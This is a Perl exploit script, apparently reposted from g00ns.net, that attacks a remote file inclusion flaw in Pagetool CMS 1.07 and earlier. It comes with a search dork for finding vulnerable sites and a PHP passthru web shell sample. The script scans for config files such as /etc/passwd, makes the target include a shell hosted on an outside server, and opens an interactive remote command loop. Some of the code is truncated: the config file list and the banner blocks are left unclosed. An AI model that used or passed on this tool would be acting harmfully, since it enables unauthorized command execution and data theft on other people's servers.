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Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
来源:www.g00ns.net 作者:TrinTiTTy 发布时间:2006-12-25  

use LWP::UserAgent;
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
# Impact level: HIGH
# Google: powered by pagetool or Pagetool Development Team
# browser use:
# http://[ site ]/src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=[ shell ]?
#=========================VULN CODE=================================
# Code:
# if (file_exists($config_file))
# include($config_file);
# ...
# include($ptconf["src"] . "pagetool/pt_profile.inc");
# include($ptconf["src"] . "pagetool/pt_functions.inc");
# Vulnerability Found by: FiSh and godXcel
# [Pagetool CMS <=1.07 (RFI)]
# [c]oded by TrinTiTTy -at- g00ns.net
# ! Vulnerability by FiSh and godXcel !
# Shoutz: z3r0, clorox, wicked, synical, ReZEN, grumpy,
# SiCK, and everyone else at g00ns.net
# greetz: 13337.org, acircle.us
# www.g00ns.net | irc.g00ns.net #g00ns | www.g00ns-forum.net
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# # Notes: #
# # Shell example <?passthru($_GET[cmd]);?> #
# # Shell variable: ($_GET[cmd]); #
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#

$host = @ARGV[0]; $shell = @ARGV[1];

if ($host =~ /http:\/\// || $shell =~ /http:\/\//)
{print "\n\n [-] Don't include http:// in your links!\n";usage();exit();}
elsif (@ARGV != 2) {head();usage();exit();}
print "\n [!] Scanning for local server config file\n\n [!] Be patient...\n";

# No credz to me for below list..
@cfgs = ("/etc/passwd",
sub scan(){
for ($i = 0; $i <=40; ++$i){
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?";
$response = $ag3nt->get($inc);
syswrite STDOUT,".";
$ans = $response->content;
if( $ans =~ /500 Server closed connection without sending any data back/)
{print "\n\n [-] Couldn't Include Shell...better luck next time.\n\n";exit;}
elsif ($ans =~ /Cannot execute a blank command/)
{print "\n [+] Server File: FOUND\n\n [+] Executing Command Shell...\n\nType quit to exit shell\n";commands();}}}
print "\n\n [-] Couldn't find valid config file...better luck next time\n\n";exit;

sub commands(){
print "\nshell\@box \$~ ";
if ($nix =~ /quit/gmi){print "\n [-] Good Bye\n";exit();}
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?cmd=".$nix.'%00';
$response = $ag3nt->get($inc);
$ans = $response->content;
if ($ans =~ /<b>Warning<\/b>:/gmi || $ans =~ /<a href=/gmi)
{print " \n[-] ERROR: Bad command, permissions, website, or shell.\n";commands();}
else {print "\n$ans";commands();}}

sub head(){
print q {
| Pagetool CMS <=1.07 (RFI) |
| [c]oded by TrinTiTTy -at- g00ns.net |
| -----------------------------------------------------|
| |
| Vulnerability by FiSh and godXcel |
| greetz: 13337.org, acircle.us |
| |
| www.g00ns.net |
sub usage(){
print q{
Usage: perl pagetool07.pl <host> <shell location>

Example: perl pagetool07.pl www.victim.net www.shellsite.com/shell.txt

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